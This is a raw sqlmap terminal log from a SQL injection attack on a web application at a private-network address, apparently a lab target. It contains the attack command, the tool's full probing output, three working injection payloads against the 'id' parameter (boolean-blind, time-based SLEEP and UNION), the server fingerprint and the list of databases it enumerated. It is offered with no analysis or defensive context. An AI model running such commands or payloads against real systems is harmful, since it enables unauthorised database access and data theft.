 sqlmap -u 'http://192.168.4.136/index.html?page=blog&title=Blog&id=2' -dbs   
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:24:38 /2023-09-11/

[13:24:38] [INFO] testing connection to the target URL
[13:24:38] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:24:38] [INFO] testing if the target URL content is stable
[13:24:39] [INFO] target URL content is stable
[13:24:39] [INFO] testing if GET parameter 'page' is dynamic
[13:24:39] [INFO] GET parameter 'page' appears to be dynamic
[13:24:39] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[13:24:39] [INFO] testing for SQL injection on GET parameter 'page'
[13:24:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:24:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:24:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:24:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:24:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:24:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:24:39] [INFO] testing 'Generic inline queries'
[13:24:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:24:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:24:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:24:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:24:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:24:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:24:39] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[13:24:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:24:41] [WARNING] GET parameter 'page' does not seem to be injectable
[13:24:41] [INFO] testing if GET parameter 'title' is dynamic
[13:24:41] [WARNING] GET parameter 'title' does not appear to be dynamic
[13:24:41] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[13:24:41] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[13:24:41] [INFO] testing for SQL injection on GET parameter 'title'
[13:24:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:24:41] [WARNING] reflective value(s) found and filtering out
[13:24:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:24:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:24:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:24:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:24:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:24:41] [INFO] testing 'Generic inline queries'
[13:24:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:24:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:24:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:24:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:24:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:24:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:24:41] [INFO] testing 'Oracle AND time-based blind'
[13:24:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:24:41] [WARNING] GET parameter 'title' does not seem to be injectable
[13:24:41] [INFO] testing if GET parameter 'id' is dynamic
[13:24:41] [INFO] GET parameter 'id' appears to be dynamic
[13:24:41] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[13:24:41] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[13:24:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:24:44] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="In")
[13:24:44] [INFO] testing 'Generic inline queries'
[13:24:44] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:24:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:24:44] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:24:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:24:44] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[13:24:44] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[13:24:44] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:24:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:24:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:24:44] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[13:24:44] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:24:44] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[13:24:44] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[13:24:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[13:24:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[13:24:44] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[13:24:44] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[13:24:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[13:24:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[13:24:44] [INFO] testing 'MySQL inline queries'
[13:24:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:24:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:24:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:24:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:24:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[13:24:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[13:24:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:24:54] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[13:24:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:24:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:24:54] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:24:54] [INFO] target URL appears to have 5 columns in query
[13:24:54] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 8711=8711

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=blog&title=Blog&id=2 AND (SELECT 2405 FROM (SELECT(SLEEP(5)))Xqim)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x7178717171,0x776d517141635356746e4b45794f544d7173506771655869614a47424f545569786b77566b514959,0x716b707171),NULL,NULL-- -
---
[13:25:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: PHP 5.1.2, Apache 2.2.0
back-end DBMS: MySQL >= 5.0.12
[13:25:03] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test

[13:25:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.4.136'

[*] ending @ 13:25:03 /2023-09-11/

